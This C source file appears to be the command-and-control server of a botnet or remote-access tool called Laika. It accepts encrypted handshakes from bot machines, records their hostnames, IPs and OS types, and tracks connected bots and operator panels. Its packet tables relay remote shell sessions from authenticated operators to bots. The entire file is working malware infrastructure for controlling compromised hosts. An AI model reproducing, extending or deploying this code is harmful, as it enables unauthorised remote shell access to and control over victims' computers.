#include "cnc.h" #include "core/lerror.h" #include "core/lmem.h" #include "core/lsodium.h" #include "core/ltask.h" #include "cauth.h" #include "cpeer.h" #include "net/lsocket.h" /* ======================================[[ PeerHashMap ]]======================================= */ typedef struct sCNC_PeerHashElem { struct sLaika_peer *peer; uint8_t *pub; } tCNC_PeerHashElem; int cnc_PeerElemCompare(const void *a, const void *b, void *udata) { const tCNC_PeerHashElem *ua = a; const tCNC_PeerHashElem *ub = b; return memcmp(ua->pub, ub->pub, crypto_kx_PUBLICKEYBYTES); } uint64_t cnc_PeerElemHash(const void *item, uint64_t seed0, uint64_t seed1) { const tCNC_PeerHashElem *u = item; return *(uint64_t *)(u->pub); /* hashes pub key (first 8 bytes) */ } /* ====================================[[ Packet Handlers ]]==================================== */ bool checkPeerKey(struct sLaika_peer *peer, void *uData) { if (sodium_memcmp(peer->peerPub, uData, crypto_kx_PUBLICKEYBYTES) == 0) LAIKA_ERROR("public key is already in use!\n"); return true; } void laikaC_handleHandshakeRequest(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) { char magicBuf[LAIKA_MAGICLEN]; struct sLaika_peerInfo *pInfo = (struct sLaika_peerInfo *)uData; struct sLaika_cnc *cnc = pInfo->cnc; char *tempIPBuf; uint8_t major, minor; laikaS_read(&peer->sock, (void *)magicBuf, LAIKA_MAGICLEN); major = laikaS_readByte(&peer->sock); minor = laikaS_readByte(&peer->sock); peer->osType = laikaS_readByte(&peer->sock); peer->type = PEER_BOT; if (memcmp(magicBuf, LAIKA_MAGIC, LAIKA_MAGICLEN) != 0 || major != LAIKA_VERSION_MAJOR || minor != LAIKA_VERSION_MINOR) LAIKA_ERROR("invalid handshake request!\n"); /* read peer's public key */ laikaS_read(&peer->sock, peer->peerPub, sizeof(peer->peerPub)); /* read hostname & inet */ laikaS_read(&peer->sock, peer->hostname, LAIKA_HOSTNAME_LEN); laikaS_read(&peer->sock, peer->inet, LAIKA_INET_LEN); /* check and make sure there's not already a peer with the same key (might throw an LAIKA_ERROR, * which will kill the peer) */ laikaC_iterPeers(cnc, checkPeerKey, (void *)peer->peerPub); /* restore null-terminator */ peer->hostname[LAIKA_HOSTNAME_LEN - 1] = '\0'; peer->inet[LAIKA_INET_LEN - 1] = '\0'; /* gen session keys */ if (crypto_kx_server_session_keys(peer->inKey, peer->outKey, cnc->pub, cnc->priv, peer->peerPub) != 0) LAIKA_ERROR("failed to gen session key!\n"); /* encrypt all future packets */ laikaS_setSecure(peer, true); /* queue response */ laikaS_startOutPacket(peer, LAIKAPKT_HANDSHAKE_RES); laikaS_writeByte(&peer->sock, laikaM_isBigEndian()); laikaS_write(&peer->sock, peer->salt, LAIKA_HANDSHAKE_SALT_LEN); laikaS_endOutPacket(peer); /* handshake (mostly) complete, we now wait for the PEER_LOGIN packets */ } void laikaC_handlePing(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) { struct sLaika_peerInfo *pInfo = (struct sLaika_peerInfo *)uData; pInfo->lastPing = laikaT_getTime(); laikaS_emptyOutPacket(peer, LAIKAPKT_PINGPONG); /* gg 2 ez */ } /* =====================================[[ Packet Tables ]]===================================== */ /* clang-format off */ #define DEFAULT_PKT_TBL \ LAIKA_CREATE_PACKET_INFO(LAIKAPKT_HANDSHAKE_REQ, \ laikaC_handleHandshakeRequest, \ LAIKA_MAGICLEN + sizeof(uint8_t) + sizeof(uint8_t) + sizeof(uint8_t) + crypto_kx_PUBLICKEYBYTES + LAIKA_HOSTNAME_LEN + LAIKA_INET_LEN, \ false), \ LAIKA_CREATE_PACKET_INFO(LAIKAPKT_PINGPONG, \ laikaC_handlePing, \ 0, \ false), \ LAIKA_CREATE_PACKET_INFO(LAIKAPKT_PEER_LOGIN_REQ, \ laikaC_handlePeerLoginReq, \ sizeof(uint8_t) + LAIKA_HANDSHAKE_SALT_LEN, \ false) struct sLaika_peerPacketInfo laikaC_peerPktTable[LAIKAPKT_MAXNONE] = { DEFAULT_PKT_TBL }; struct sLaika_peerPacketInfo laikaC_botPktTbl[LAIKAPKT_MAXNONE] = { DEFAULT_PKT_TBL, LAIKA_CREATE_PACKET_INFO(LAIKAPKT_SHELL_CLOSE, laikaC_handleShellClose, sizeof(uint32_t), false), LAIKA_CREATE_PACKET_INFO(LAIKAPKT_SHELL_DATA, laikaC_handleShellData, sizeof(uint32_t), /* packet must be bigger than this */ true), }; struct sLaika_peerPacketInfo laikaC_authPktTbl[LAIKAPKT_MAXNONE] = { DEFAULT_PKT_TBL, LAIKA_CREATE_PACKET_INFO(LAIKAPKT_AUTHENTICATED_SHELL_OPEN_REQ, laikaC_handleAuthenticatedShellOpen, crypto_kx_PUBLICKEYBYTES + sizeof(uint16_t) + sizeof(uint16_t), false), LAIKA_CREATE_PACKET_INFO(LAIKAPKT_SHELL_CLOSE, laikaC_handleAuthenticatedShellClose, sizeof(uint32_t), false), LAIKA_CREATE_PACKET_INFO(LAIKAPKT_SHELL_DATA, laikaC_handleAuthenticatedShellData, sizeof(uint32_t), /* packet must be bigger than this */ true), }; #undef DEFAULT_PKT_TBL /* clang-format on */ /* ==========================================[[ CNC ]]========================================== */ struct sLaika_cnc *laikaC_newCNC(uint16_t port) { struct sLaika_cnc *cnc = laikaM_malloc(sizeof(struct sLaika_cnc)); /* init peer hashmap & panel list */ cnc->peers = hashmap_new(sizeof(tCNC_PeerHashElem), 8, 0, 0, cnc_PeerElemHash, cnc_PeerElemCompare, NULL, NULL); laikaM_initVector(cnc->authPeers, 4); laikaM_initVector(cnc->authKeys, 4); cnc->port = port; /* init socket (we just need it for the raw socket fd and abstracted API :P) & pollList */ laikaS_initSocket(&cnc->sock, NULL, NULL, NULL, NULL); laikaP_initPList(&cnc->pList); if (sodium_init() < 0) { laikaC_freeCNC(cnc); LAIKA_ERROR("LibSodium failed to initialize!\n"); } /* load keys */ LAIKA_DEBUG("using pubkey: %s\n", LAIKA_PUBKEY); if (!laikaK_loadKeys(cnc->pub, cnc->priv, LAIKA_PUBKEY, LAIKA_PRIVKEY)) { laikaC_freeCNC(cnc); LAIKA_ERROR("Failed to init cnc keypairs!\n"); } laikaC_addAuthKey(cnc, LAIKA_PUBKEY); return cnc; } void laikaC_bindServer(struct sLaika_cnc *cnc) { /* bind sock to port */ laikaS_bind(&cnc->sock, cnc->port); /* add sock to pollList */ laikaP_addSock(&cnc->pList, &cnc->sock); } void laikaC_freeCNC(struct sLaika_cnc *cnc) { int i; laikaS_cleanSocket(&cnc->sock); laikaP_cleanPList(&cnc->pList); hashmap_free(cnc->peers); /* free auth keys */ for (i = 0; i < laikaM_countVector(cnc->authKeys); i++) { laikaM_free(cnc->authKeys[i]); } laikaM_free(cnc->authKeys); laikaM_free(cnc); } void laikaC_onAddPeer(struct sLaika_cnc *cnc, struct sLaika_peer *peer) { int i; /* add to peer lookup map */ hashmap_set(cnc->peers, &(tCNC_PeerHashElem){.pub = peer->peerPub, .peer = peer}); /* notify connected panels of the newly connected peer */ for (i = 0; i < laikaM_countVector(cnc->authPeers); i++) { laikaC_sendNewPeer(cnc->authPeers[i], peer); } switch (peer->type) { case PEER_PEER: /* should never be reached */ break; case PEER_BOT: /* TODO */ break; case PEER_AUTH: /* add peer to panels list (if it's a panel) */ laikaC_addAuth(cnc, peer); /* send a list of peers */ laikaC_sendPeerList(cnc, peer); break; default: break; } GETPINFOFROMPEER(peer)->completeHandshake = true; } void laikaC_onRmvPeer(struct sLaika_cnc *cnc, struct sLaika_peer *peer) { int i; /* ignore uninitalized peers */ if (!(GETPINFOFROMPEER(peer)->completeHandshake)) return; /* close any open shells */ laikaC_closeShells(peer); switch (peer->type) { case PEER_PEER: /* should never be reached */ break; case PEER_BOT: /* TODO */ break; case PEER_AUTH: /* remove peer from panels list */ laikaC_rmvAuth(cnc, peer); break; default: break; } /* notify connected panels of the disconnected peer */ for (i = 0; i < laikaM_countVector(cnc->authPeers); i++) { laikaC_sendRmvPeer(cnc->authPeers[i], peer); } /* remove from peer lookup map */ hashmap_delete(cnc->peers, &(tCNC_PeerHashElem){.pub = peer->peerPub, .peer = peer}); } void laikaC_setPeerType(struct sLaika_cnc *cnc, struct sLaika_peer *peer, PEERTYPE type) { /* make sure to update connected peers */ laikaC_onRmvPeer(cnc, peer); /* free old peerInfo */ laikaC_freePeerInfo(peer, peer->uData); /* update accepted packets */ peer->type = type; switch (type) { case PEER_PEER: peer->packetTbl = laikaC_peerPktTable; peer->uData = laikaC_newPeerInfo(cnc); break; case PEER_AUTH: peer->packetTbl = laikaC_authPktTbl; peer->uData = laikaC_newAuthInfo(cnc); break; case PEER_BOT: peer->packetTbl = laikaC_botPktTbl; peer->uData = laikaC_newBotInfo(cnc); break; default: LAIKA_ERROR("laikaC_setPeerType: invalid peerType!\n"); break; } /* a new (but not-so-new) peer has arrived */ laikaC_onAddPeer(cnc, peer); } void laikaC_addAuth(struct sLaika_cnc *cnc, struct sLaika_peer *authPeer) { /* grow array if we need to */ laikaM_growVector(struct sLaika_peer *, cnc->authPeers, 1); /* insert into authenticated peer table */ cnc->authPeers[laikaM_countVector(cnc->authPeers)++] = authPeer; LAIKA_DEBUG("added panel %p!\n", authPeer); } void laikaC_rmvAuth(struct sLaika_cnc *cnc, struct sLaika_peer *authPeer) { int i; for (i = 0; i < laikaM_countVector(cnc->authPeers); i++) { if (cnc->authPeers[i] == authPeer) { /* we found the index for our panel! */ laikaM_rmvVector(cnc->authPeers, i, 1); return; } } } void laikaC_addAuthKey(struct sLaika_cnc *cnc, const char *key) { uint8_t *buf; laikaM_growVector(uint8_t *, cnc->authKeys, 1); buf = laikaM_malloc(crypto_kx_PUBLICKEYBYTES); if (!laikaK_loadKeys(buf, NULL, key, NULL)) LAIKA_ERROR("Failed to load key '%s'\n", key); /* insert key */ cnc->authKeys[laikaM_countVector(cnc->authKeys)++] = buf; printf("[~] Added authenticated public key '%s'\n", key); } void laikaC_killPeer(struct sLaika_cnc *cnc, struct sLaika_peer *peer) { laikaC_onRmvPeer(cnc, peer); /* free peerInfo if it's defined */ if (peer->uData) laikaC_freePeerInfo(peer, peer->uData); laikaP_rmvSock(&cnc->pList, (struct sLaika_socket *)peer); laikaS_freePeer(peer); LAIKA_DEBUG("peer %p killed!\n", peer); } /* socket event */ void laikaC_onPollFail(struct sLaika_socket *sock, void *uData) { struct sLaika_peer *peer = (struct sLaika_peer *)sock; struct sLaika_cnc *cnc = (struct sLaika_cnc *)uData; laikaC_killPeer(cnc, peer); } bool laikaC_pollPeers(struct sLaika_cnc *cnc, int timeout) { struct sLaika_peer *peer; struct sLaika_pollEvent *evnts, *evnt; int numEvents, i; laikaP_flushOutQueue(&cnc->pList); evnts = laikaP_poll(&cnc->pList, timeout, &numEvents); /* if we have 0 events, we reached the timeout, let the caller know */ if (numEvents == 0) { return false; } /* walk through and handle each event */ for (i = 0; i < numEvents; i++) { evnt = &evnts[i]; if (evnt->sock == &cnc->sock) { /* event on listener? */ peer = laikaS_newPeer(laikaC_peerPktTable, &cnc->pList, laikaC_onPollFail, cnc, (void *)laikaC_newPeerInfo(cnc)); LAIKA_TRY /* setup and accept new peer */ laikaS_acceptFrom(&peer->sock, &cnc->sock, peer->ipStr); laikaS_setNonBlock(&peer->sock); /* add to our pollList */ laikaP_addSock(&cnc->pList, &peer->sock); LAIKA_DEBUG("new peer %p!\n", peer); LAIKA_CATCH /* acceptFrom() and setNonBlock() can fail */ LAIKA_DEBUG("failed to accept peer %p!\n", peer); laikaS_freePeer(peer); LAIKA_TRYEND continue; } laikaP_handleEvent(evnt); } laikaP_flushOutQueue(&cnc->pList); return true; } struct sLaika_peer *laikaC_getPeerByPub(struct sLaika_cnc *cnc, uint8_t *pub) { tCNC_PeerHashElem *elem = (tCNC_PeerHashElem *)hashmap_get(cnc->peers, &(tCNC_PeerHashElem){.pub = pub}); return elem ? elem->peer : NULL; } void laikaC_sweepPeersTask(struct sLaika_taskService *service, struct sLaika_task *task, clock_t currTick, void *uData) { struct sLaika_cnc *cnc = (struct sLaika_cnc *)uData; struct sLaika_peer *peer; struct sLaika_peerInfo *pInfo; size_t i = 0; long currTime = laikaT_getTime(); while (laikaC_iterPeersNext(cnc, &i, &peer)) { pInfo = GETPINFOFROMPEER(peer); /* peer has been silent for a while, kill 'em */ if (currTime - pInfo->lastPing > LAIKA_PEER_TIMEOUT) { LAIKA_DEBUG("timeout reached for %p! [%ld]\n", peer, currTime); laikaC_killPeer(cnc, peer); /* reset peer iterator (since the hashmap mightve been reallocated/changed) */ i = 0; } } } /* =======================================[[ Peer Iter ]]======================================= */ bool laikaC_iterPeersNext(struct sLaika_cnc *cnc, size_t *i, struct sLaika_peer **peer) { tCNC_PeerHashElem *elem; if (hashmap_iter(cnc->peers, i, (void **)&elem)) { *peer = elem->peer; return true; } *peer = NULL; return false; } void laikaC_iterPeers(struct sLaika_cnc *cnc, tLaika_peerIter iter, void *uData) { size_t i = 0; struct sLaika_peer *peer; /* call iter for every peer in cnc->peers */ while (laikaC_iterPeersNext(cnc, &i, &peer)) iter(peer, uData); }